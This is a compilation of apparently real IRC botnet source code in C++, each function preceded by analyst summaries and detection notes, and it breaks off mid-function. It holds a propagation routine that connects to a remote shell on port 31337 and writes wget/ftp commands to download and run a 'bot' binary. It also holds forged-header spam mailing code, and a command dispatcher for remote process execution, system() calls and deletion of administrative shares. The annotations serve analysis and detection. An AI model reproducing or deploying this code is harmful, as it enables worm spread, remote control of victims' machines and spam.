// Analyst summary: propagation routine of the scanner module, run against one target host.
//  - Returns false when the local IP is public while the target is private (per IsPrivate(),
//    defined elsewhere), and when the process is not running as uid 0.
//  - Calls ExploitInt(0)..ExploitInt(3) (not shown here), then attempts a TCP connect to port 31337
//    on the target.
//  - On a successful connect it reads up to 8192 bytes (RecvTO, timeout argument 2000) and writes three
//    shell command lines taken from the string literals below: a scripted `ftp -n` retrieval of a file
//    named "bot" from this host's FTP port (bot_ftrans_port_ftp), a `wget ftp://bla:bla@<host>:<port>/bot`
//    retrieval, and a `chmod 777 ./bot ; ./bla` line. Replies are read but never inspected; the function
//    returns true once the commands are written.
// Detection: a session on TCP 31337 followed by ftp/wget child processes fetching a file named "bot"
// over FTP (user "ftp" or "bla") is the observable footprint of this routine.
// NOTE(review): the targeted service is implied only by the class name; the vulnerability is not
// identified anywhere in this excerpt.
bool CScannerEthereal::Exploit() { if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false; // We need root to exploit this cause we need to spoof packets if(getuid()) return false; ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3); CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) { CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000); sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n"); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sShellSocket.Disconnect(); return true; } else return false; }
// Analyst summary: entry point for every chat message the bot receives (variant that reaches the
// controller through the g_pMainCtrl pointer).
//  - Reply target: sDest when it starts with '#', otherwise sSrc; notices always reply to sSrc; when
//    bOutchan is set, the text following " -o" in the chat string replaces the reply target.
//  - sCmd is the first space-delimited token with its first character removed.
//  - A message whose first byte equals bot_prefix.sValue[0] is treated as a command. "bot.repeat <n> ..."
//    drops the first two tokens and dispatches the remainder n times, where n comes from atoi() with no
//    upper bound applied here; every other command is dispatched once. bInternal selects HandleMsgInt
//    over HandleMsg.
//  - Otherwise, when Find(m_sUserName) on the first token is non-zero, the first token is dropped and
//    Recv() calls itself on the remainder; if not, HandleFallBack() runs.
// NOTE(review): no sender authentication is visible in this function; whether HandleMsg/HandleMsgInt
// perform it cannot be determined from this excerpt.
void CBot::Recv(CMessage *pMsg, bool bInternal) { #ifdef DBGCONSOLE if(pMsg->sDest[0]=='#') g_pMainCtrl->m_cConsDbg.Log(5, "<%s> %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); else g_pMainCtrl->m_cConsDbg.Log(5, "*%s* %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); #endif if(pMsg->sDest[0]=='#') pMsg->sReplyTo.Assign(pMsg->sDest); else pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bNotice) pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bOutchan) { CString sOutchan; sOutchan.Assign(pMsg->sChatString.Mid(pMsg->sChatString.Find(" -o")+3)); pMsg->sReplyTo.Assign(sOutchan); } pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); // Check if its a bot command by comparing the first byte to the bot_prefix value if(pMsg->sChatString[0]==bot_prefix.sValue[0]) { if(!pMsg->sCmd.Compare("bot.repeat")) { if(!pMsg->sChatString.Token(1, " ").Compare("")) return; int i=0, iNum=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iNum) return; CString sNewCStr=pMsg->sChatString.Mid(pMsg->sChatString.Find(' ')); sNewCStr=sNewCStr.Mid(sNewCStr.Find(' ')); pMsg->sChatString.Assign(sNewCStr); pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); if(!bInternal) for(i=0;i<iNum;i++) HandleMsg(pMsg); else for(i=0;i<iNum;i++) HandleMsgInt(pMsg); } else if(!bInternal) HandleMsg(pMsg); else HandleMsgInt(pMsg); } else if(pMsg->sChatString.Token(0, " ").Find(g_pMainCtrl->m_sUserName)) { // botname .command mod - deejayfuzion CString sNewCStr=pMsg->sChatString.Mid(pMsg->sChatString.Find(' ')); pMsg->sChatString.Assign(sNewCStr); pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ")); this->Recv(pMsg, bInternal); } else { // fallback handler HandleFallBack(pMsg); } }
// Analyst summary: builds a mail-queue-style identifier shaped like the sample quoted in the source
// comment (E1AOkjD-0001RE-00). It starts from a template containing '-' separators and overwrites
// positions 0-6 with random upper/lower-case letters or digits, 8-11 with digits, 12-13 with uppercase
// letters and 15-16 with digits, using brandom(lo, hi) on ASCII code ranges.
// As listed, the function returns CString("") rather than sID, so callers receive an empty string.
// NOTE(review): the template literal looks whitespace-collapsed on this page; indices up to 16 are
// written, so the original template was presumably 17 characters long.
CString GenerateID() { // E1AOkjD-0001RE-00 CString sID; sID.Assign(" - - "); for(int i=0; i<7; i++) { int iType=brandom(1,3); switch(iType) { case 1: // Uppercase letter sID[i]=brandom(65, 90); break; case 2: // Lowercase letter sID[i]=brandom(97, 122); break; case 3: // Number sID[i]=brandom(48, 57); break; } } for(i=8; i<12; i++) { // Number sID[i]=brandom(48, 57); } for(i=12; i<14; i++) { // Uppercase letter sID[i]=brandom(65, 90); } for(i=15; i<17; i++) { // Number sID[i]=brandom(48, 57); } return CString(""); }
/// Returns the directory used for temporary files, with a trailing path separator.
///
/// Windows builds (OS_WIN): takes the path reported by GetTempPath(); when that call
/// fails or yields an empty string, falls back to RootDirPath() + "Temp\\".
/// Other builds: takes the TMPDIR environment variable, falling back to "/tmp/" when
/// the resulting string is empty.
CString TempDirPath(void)
{
    CString sTempDir;

#ifdef OS_WIN
    char szBuf[MAX_PATH_LENGTH];

    if (GetTempPath(MAX_PATH_LENGTH, szBuf))
        sTempDir.Assign((char*)&szBuf);

    // GetTempPath failed or produced nothing: use a directory below the root path.
    if (sTempDir.IsEmpty())
        sTempDir = RootDirPath()+"Temp\\";
#else
    // NOTE(review): getenv() returns a null pointer when TMPDIR is unset; this relies on
    // CString assignment accepting that and yielding an empty string - confirm.
    sTempDir = getenv("TMPDIR");

    if (sTempDir.IsEmpty())
        sTempDir = "/tmp/";
#endif

    return sTempDir;
}
// Analyst summary: entry point for every chat message the bot receives (variant that uses the
// g_cMainCtrl object directly).
//  - Reply target: sDest when it starts with '#', otherwise sSrc; notices always reply to sSrc; when
//    bOutchan is set, the text following " -o" in the chat string replaces the reply target.
//  - sCmd is the first space-delimited token with its first character removed.
//  - Only messages whose first byte equals bot_prefix.sValue[0] are handled; there is no bot-name or
//    fallback branch in this variant.
//  - The repeat command's name is produced at run time by dp(...), a helper defined elsewhere that turns
//    an integer list into a string - presumably to keep the plaintext out of the binary's strings.
//    The repeat branch is taken only when g_cMainCtrl.m_cMac.FindLogin(pMsg->sSrc) is also non-zero;
//    the repeat count comes from atoi() with no upper bound applied here.
//  - bInternal selects HandleMsgInt over HandleMsg.
void CBot::Recv(CMessage *pMsg, bool bInternal) { #ifdef DBGCONSOLE if(pMsg->sDest[0]=='#') g_cMainCtrl.m_cConsDbg.Log(5, "<%s> %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); else g_cMainCtrl.m_cConsDbg.Log(5, "*%s* %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); #endif if(pMsg->sDest[0]=='#') pMsg->sReplyTo.Assign(pMsg->sDest); else pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bNotice) pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bOutchan) { CString sOutchan; sOutchan.Assign(pMsg->sChatString.Mid(pMsg->sChatString.Find(" -o")+3)); pMsg->sReplyTo.Assign(sOutchan); } pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); // Check if its a bot command by comparing the first byte to the bot_prefix value if(pMsg->sChatString[0]==bot_prefix.sValue[0]) { if(!pMsg->sCmd.Compare(dp(2,15,20,78,18,5,16,5,1,20,0).CStr()) && g_cMainCtrl.m_cMac.FindLogin(pMsg->sSrc)) { if(!pMsg->sChatString.Token(1, " ").Compare("")) return; int i=0, iNum=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iNum) return; CString sNewCStr=pMsg->sChatString.Mid(pMsg->sChatString.Find(' ')); sNewCStr=sNewCStr.Mid(sNewCStr.Find(' ')); pMsg->sChatString.Assign(sNewCStr); pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); if(!bInternal) for(i=0;i<iNum;i++) HandleMsg(pMsg); else for(i=0;i<iNum;i++) HandleMsgInt(pMsg); } else if(!bInternal) HandleMsg(pMsg); else HandleMsgInt(pMsg); } }
// Analyst summary: sends one message over an already-open SMTP session and fabricates the trace
// headers so the mail appears to have been handed over locally by a common Unix MTA.
//  - Picks a random MTA personality (m_iMTAType) and a random OS label, then formats a banner string
//    (sMTA) with random version numbers for the "unknown", Exim, sendmail and qmail cases; the other
//    MTA_TYPE_* cases produce no banner, and an out-of-range type disconnects and returns false.
//  - Issues MAIL FROM, RCPT TO and DATA, expecting reply codes 250, 250 and 354; any other code
//    disconnects and returns false.
//  - Builds the header block: a "Received: from <local part> by <local host> ... with local" line
//    carrying the banner, and - only when m_bUseSMTPExt is set - "id", "for <rcpt>; <time>" and
//    "Message-Id: <id@rcpt>" lines; then From, To, Subject, Date (formatted as GMT), MIME-Version,
//    Content-Type text/html and Content-Transfer-Encoding 7bit, followed by sData and the
//    terminating "\r\n.\r\n".
//  - Returns true only when the final reply starts with 250.
// Detection: the Message-Id domain part is the full recipient address, and the Received line claims
// local submission with a banner that need not match the real sending host; both are anomalies a mail
// filter can key on. GenerateID() as listed on this page returns an empty string, which would leave
// the id portion empty.
// NOTE(review): sMailFrom, sRcptTo, sSubject and sData are appended without any CR/LF filtering here.
// NOTE(review): comment markers and commented-out alternatives are collapsed onto the same physical
// lines as live statements on this page, so which Content-Type / blank-line appends are active cannot
// be settled from this excerpt.
bool CSMTP_Connection::Mail(CString sMailFrom, CString sMailFromFull, CString sRcptTo, CString sSubject, CString sData) { CString sReqBuf, sRecvBuf, sHost, sSrcID, sMTA, sOS; init_random(); m_iMTAType=brandom(MTA_TYPE_UNKNOWN, MTA_TYPE_QMAIL); switch(brandom(1,5)) { case 1: sOS.Assign("Debian"); break; case 2: sOS.Assign("RedHat"); break; case 3: sOS.Assign("SuSE"); break; case 4: sOS.Assign("Slackware"); break; case 5: sOS.Assign("FreeBSD"); break; default: sOS.Assign("Unknown"); break; } switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sMTA.Format("SMTP %s.%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sOS.CStr()); } break; case MTA_TYPE_EXIM: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sNumber.Assign(brandom(1, 5)); sMTA.Format("Exim %s.%s #%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sNumber.CStr(), sOS.CStr()); } break; case MTA_TYPE_SENDMAIL: { CString sVersionHigh, sVersionLow, sVersionLow2; sVersionHigh.Assign(brandom(1, 12)); sVersionLow.Assign(brandom(1, 10)); sVersionLow2.Assign(brandom(1, 10)); sMTA.Format("8.%s.%s/8.%s.%s", sVersionHigh.CStr(), sVersionLow.CStr(), sVersionHigh.CStr(), sVersionLow2.CStr()); } break; case MTA_TYPE_QMAIL: { CString sPid; sPid.Assign(brandom(1, 65000)); CString sInvokedBy; int iInvokedBy=brandom(1,3); if(iInvokedBy==1) { sInvokedBy.Assign("alias"); } else if(iInvokedBy==2) { sInvokedBy.Assign("network"); } else if(iInvokedBy==3) { sInvokedBy.Assign("uid 0"); } sMTA.Format("qmail %s invoked by %s", sPid.CStr(), sInvokedBy.CStr()); } break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; default: #ifdef DBGCONSOLE 
g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Invalid MTA type selected!\n", this); #endif // DBGCONSOLE Disconnect(); return false; break; } // Generate an ID CString sID=GenerateID(); sSrcID.Assign(sID); // Get local hostname sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()); // Send MAIL FROM command sReqBuf.Format("MAIL FROM:<%s>\r\n", sMailFrom.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // MAIL FROM failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\" (\"%s\")!\n", this, sMailFrom.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send RCPT TO command sReqBuf.Format("RCPT TO:<%s>\r\n", sRcptTo.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // RCPT TO failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected RCTP TO \"%s\" (\"%s\")!\n", this, sRcptTo.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send DATA command sReqBuf.Format("DATA\r\n"); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("354")) { // DATA failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected DATA (\"%s\")!\n", this, sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Get local time time_t tGlobal=time(NULL); char szTimeBuf[4096]; strftime(szTimeBuf, sizeof(szTimeBuf), "%a, %d %b %Y %H:%M:%S GMT", gmtime(&tGlobal)); // Clear buffer sReqBuf.Assign(""); switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: 
sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_EXIM: // Received: from xxxx by xxxxx.xxxxxxx.xxx with local (Exim 3.36 #1 (Debian)) sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(")\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_SENDMAIL: // Received: from xxxx by xxxx.xxxxxxx.xxx (8.12.8p1/8.12.6) with local sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append("(8."); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(") with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 
sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_QMAIL: // Received: (qmail 21608 invoked by alias); 17 Jul 2002 14:30:10 -0000 sReqBuf.Append("Received: ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append("); "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; } // From: xxxx <*****@*****.**> sReqBuf.Append("From: "); sReqBuf.Append(sMailFromFull.CStr()); sReqBuf.Append(" <"); sReqBuf.Append(sMailFrom.CStr()); sReqBuf.Append(">\r\n"); // To: [email protected] sReqBuf.Append("To: "); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append("\r\n"); // Subject: bla sReqBuf.Append("Subject: "); sReqBuf.Append(sSubject.CStr()); sReqBuf.Append("\r\n"); // Date: Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("Date: "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // MIME-Version: 1.0 sReqBuf.Append("MIME-Version: 1.0\r\n"); // if(g_cSMTPLogic.spam_htmlemail.bValue) { // Content-Type: text/html; charset=us-ascii sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // } else { // // Content-Type: text/plain; charset=us-ascii // sReqBuf.Append("Content-Type: text/plain; charset=us-ascii\r\n"); // } sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // Content-Transfer-Encoding: 7bit sReqBuf.Append("Content-Transfer-Encoding: 7bit\r\n"); // // <data> // . 
// if(g_cSMTPLogic.spam_htmlemail.bValue) { sReqBuf.Append("\r\n\r\n"); // } else { // sReqBuf.Append("\r\n"); // } sReqBuf.Append("\r\n\r\n"); sReqBuf.Append(sData.CStr()); sReqBuf.Append("\r\n.\r\n"); // Send data m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if data was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // Data not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\", RCPT TO \"%s\"!\n", this, sMailFrom.CStr(), sRcptTo.CStr()); #endif // DBGCONSOLE Disconnect(); return false; } return true; }
// Analyst summary: SMTP greeting step for the mail-sending component.
//  - Sends "EHLO <local host>" using the host name held in g_pMainCtrl->m_cIRC.m_sLocalHost.
//  - A reply starting with 250 sets m_bUseSMTPExt=true and returns true.
//  - Any other reply triggers a "HELO <local host>" retry; a 250 reply to that sets
//    m_bUseSMTPExt=false and returns true, anything else disconnects and returns false.
//  - A Recv() result of zero at either step is treated as a connection reset: disconnect, return false.
// Only the first three bytes of each reply are examined; multi-line replies are not parsed here.
bool CSMTP_Connection::Hello() { CString sReqBuf; CString sRecvBuf; CString sHost; // Get local hostname sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()); // Send EHLO command sReqBuf.Format("EHLO %s\r\n", sHost.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if EHLO was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // EHLO not accepted, try HELO (no ESMTP) #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected EHLO, disabling SMTP extensions!\n", this); #endif // DBGCONSOLE // Send HELO command sReqBuf.Format("HELO %s\r\n", sHost.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if HELO was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // HELO not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected HELO!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // HELO accepted, disable ESMTP and return true m_bUseSMTPExt=false; return true; } #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Enabled SMTP extensions!\n", this); #endif // DBGCONSOLE // EHLO accepted, enable ESMTP and return true m_bUseSMTPExt=true; return true; }
// Analyst summary: core command dispatcher (variant whose command names come from m_cmd*.sName
// and whose sensitive strings are produced at run time by dp(...), a decoding helper defined
// elsewhere; those integer lists are not decoded in this note). pMsg->sCmd is compared against each
// registered name in turn; the return value is false when nothing matches.
// Handlers visible here, in order:
//  - id / about / sysinfo: send bot_id, the name-version string, or SysInfo() to sReplyTo.
//  - execute: Windows only; expands environment variables in the operator-supplied command line and
//    starts it with CreateProcess (DETACHED_PROCESS), window shown or hidden per the first argument.
//  - remove: when the argument equals this bot's nick, deletes the autostart registry value and/or
//    service if enabled, calls m_cInstaller.Uninstall() and stops the main loops.
//  - flushdns: Windows only; the source comment gives the plaintext as "ipconfig.exe /flushdns".
//  - open: passes the first argument to ShellExecute with the "open" verb.
//  - quit: stops the IRC loop.  dns: forward or reverse lookup of the argument, result sent to sReplyTo.
//  - rndnick / nick: change the IRC nickname (truncated to 32 characters).
//  - command: Windows only; passes the remainder of the chat string to system().
//  - longuptime: reports LongUptime(days), defaulting to 7 days.
//  - secure: Windows only; writes "N" to a dp()-named value under HKLM\Software\Microsoft\OLE, then
//    repeatedly deletes dp()-named values from a dp()-named registry location, kills dp()-named
//    processes, deletes the matching files from the system directory, and removes the c$, d$, ipc$
//    and admin$ shares with "net share ... /delete /y".
// Detection: process creation of "net share <name>$ /delete /y" from a non-administrative parent,
// writes under HKLM\Software\Microsoft\OLE, and cmd/CreateProcess children of a process holding an
// IRC connection are the host-side signals this block produces.
// NOTE(review): no authorisation check appears inside this function; it presumably happens in the
// caller - confirm.
bool CBot::HandleCommand(CMessage *pMsg) { // ID if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } // Execute else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr())) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } #endif return true; } // Remove Bot else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) { CString sNick(pMsg->sChatString.Token(1, " ", true)); if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) { if(g_cMainCtrl.m_cBot.as_enabled.bValue) g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue); if(g_cMainCtrl.m_cBot.as_service.bValue) g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue); g_cMainCtrl.m_cInstaller.Uninstall(); g_cMainCtrl.m_cIRC.m_bRunning=false; g_cMainCtrl.m_bRunning=false; } } // About else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); } // Flush DNS else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) { #ifdef WIN32 // ipconfig.exe /flushdns Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr()); #endif return true; } // Open File else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) { 
CString sText; sText=pMsg->sChatString.Token(1, " ").CStr(); CString bRet; bRet=(char)ShellExecute( NULL, "open", sText.CStr(), NULL, NULL, SW_SHOWNORMAL ); // bRet=system(sText.CStr())>0; // if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); //else return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); } // Quit else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) { g_cMainCtrl.m_cIRC.m_bRunning=false; return true; } // DNS else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr()); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } // Random Nickname else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr()); g_cMainCtrl.m_sUserName.Format("%s", 